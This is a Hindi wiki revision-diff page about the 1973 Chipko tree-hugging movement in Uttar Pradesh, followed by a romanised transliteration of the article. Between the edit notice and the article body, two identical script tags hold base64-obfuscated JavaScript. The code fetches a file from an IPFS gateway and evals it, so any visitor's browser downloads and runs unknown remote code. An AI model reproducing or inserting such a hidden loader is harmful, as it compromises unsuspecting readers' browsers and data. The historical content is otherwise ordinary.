Difference between revisions of "चिपको आंदोलन"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} {{tocright}} '''चिपको आंदोलन''' 1973 में [[उत्तर प्रद...' के साथ नया पन्ना बनाया)
 
Line 5: Line 5:
 
यह आंदोलन सैकड़ों विकेंद्रित तथा स्थानीय स्वत: स्फूर्त प्रयासों का परिणाम था। इस आंदोलन की नेता और कार्यकर्ता मुख्यत: ग्रामीण महिलाएँ थीं, जो अपने जीवनयापन के साधन व समुदाय को बचाने के लिए तत्पर थीं। पर्यावरणीय विनाश के ख़िलाफ़ शांत अहिंसक विरोध प्रदर्शन इस आंदोलन की अद्वितीय विशेषता थी।  
 
यह आंदोलन सैकड़ों विकेंद्रित तथा स्थानीय स्वत: स्फूर्त प्रयासों का परिणाम था। इस आंदोलन की नेता और कार्यकर्ता मुख्यत: ग्रामीण महिलाएँ थीं, जो अपने जीवनयापन के साधन व समुदाय को बचाने के लिए तत्पर थीं। पर्यावरणीय विनाश के ख़िलाफ़ शांत अहिंसक विरोध प्रदर्शन इस आंदोलन की अद्वितीय विशेषता थी।  
 
==आंदोलन का प्रभाव==  
 
==आंदोलन का प्रभाव==  
उत्तर प्रदेश में इस आंदोलन ने 1980 में तब एक बड़ी जीत हासिल की, जब तत्कालीन प्रधानमंत्री इंदिरा गाँधी ने प्रदेश के हिमालयी वनों में वृक्षों की कटाई पर 15 वर्षों के लिए रोक लगा दी। बाद के [[वर्ष|वर्षों]] में यह आंदोलन उत्तर में [[हिमाचल प्रदेश]], दक्षिण में [[कर्नाटक]], पश्चिम में [[राजस्थान]], पूर्व में [[बिहार]] और मध्य भारत में विंध्य तक फैला।  
+
उत्तर प्रदेश में इस आंदोलन ने 1980 में तब एक बड़ी जीत हासिल की, जब तत्कालीन [[प्रधानमंत्री]] [[इंदिरा गाँधी]] ने प्रदेश के हिमालयी वनों में वृक्षों की कटाई पर 15 वर्षों के लिए रोक लगा दी। बाद के [[वर्ष|वर्षों]] में यह आंदोलन उत्तर में [[हिमाचल प्रदेश]], दक्षिण में [[कर्नाटक]], पश्चिम में [[राजस्थान]], पूर्व में [[बिहार]] और मध्य भारत में विंध्य तक फैला।  
  
 
उत्तर प्रदेश में प्रतिबंध के अलावा यह आंदोलन पश्चिमी घाट और [[विंध्य पर्वतमाला]] में वृक्षों की कटाई को रोकने में सफल रहा। साथ ही यह लोगों की आवश्यकताओं और पर्यावरण के प्रति अधिक सचेत प्राकृतिक संसाधन नीति के लिए दबाब बनाने में भी सफल रहा।   
 
उत्तर प्रदेश में प्रतिबंध के अलावा यह आंदोलन पश्चिमी घाट और [[विंध्य पर्वतमाला]] में वृक्षों की कटाई को रोकने में सफल रहा। साथ ही यह लोगों की आवश्यकताओं और पर्यावरण के प्रति अधिक सचेत प्राकृतिक संसाधन नीति के लिए दबाब बनाने में भी सफल रहा।   

Revision as of 08:24, 23 May 2012

chitr:Icon-edit.gif is lekh ka punarikshan evan sampadan hona avashyak hai. ap isamean sahayata kar sakate haian. "sujhav"

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chipako aandolan 1973 mean uttar pradesh ke vanoan mean shaant aur ahiansak virodh pradarshan kiya, jisamean vyavasayik uddeshyoan ke lie vanoan ki aandhadhuandh kataee ko rokane ke lie mahilaean vrikshoan se chipakakar kh di ho gee thian.

mukhy karyakarta

yah aandolan saik doan vikeandrit tatha sthaniy svat: sphoort prayasoan ka parinam tha. is aandolan ki neta aur karyakarta mukhyat: gramin mahilaean thian, jo apane jivanayapan ke sadhan v samuday ko bachane ke lie tatpar thian. paryavaraniy vinash ke khilaf shaant ahiansak virodh pradarshan is aandolan ki advitiy visheshata thi.

aandolan ka prabhav

uttar pradesh mean is aandolan ne 1980 mean tab ek b di jit hasil ki, jab tatkalin pradhanamantri iandira gaandhi ne pradesh ke himalayi vanoan mean vrikshoan ki kataee par 15 varshoan ke lie rok laga di. bad ke varshoan mean yah aandolan uttar mean himachal pradesh, dakshin mean karnatak, pashchim mean rajasthan, poorv mean bihar aur madhy bharat mean viandhy tak phaila.

uttar pradesh mean pratibandh ke alava yah aandolan pashchimi ghat aur viandhy parvatamala mean vrikshoan ki kataee ko rokane mean saphal raha. sath hi yah logoan ki avashyakataoan aur paryavaran ke prati adhik sachet prakritik sansadhan niti ke lie dabab banane mean bhi saphal raha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh


bahari k diyaan

sanbandhit lekh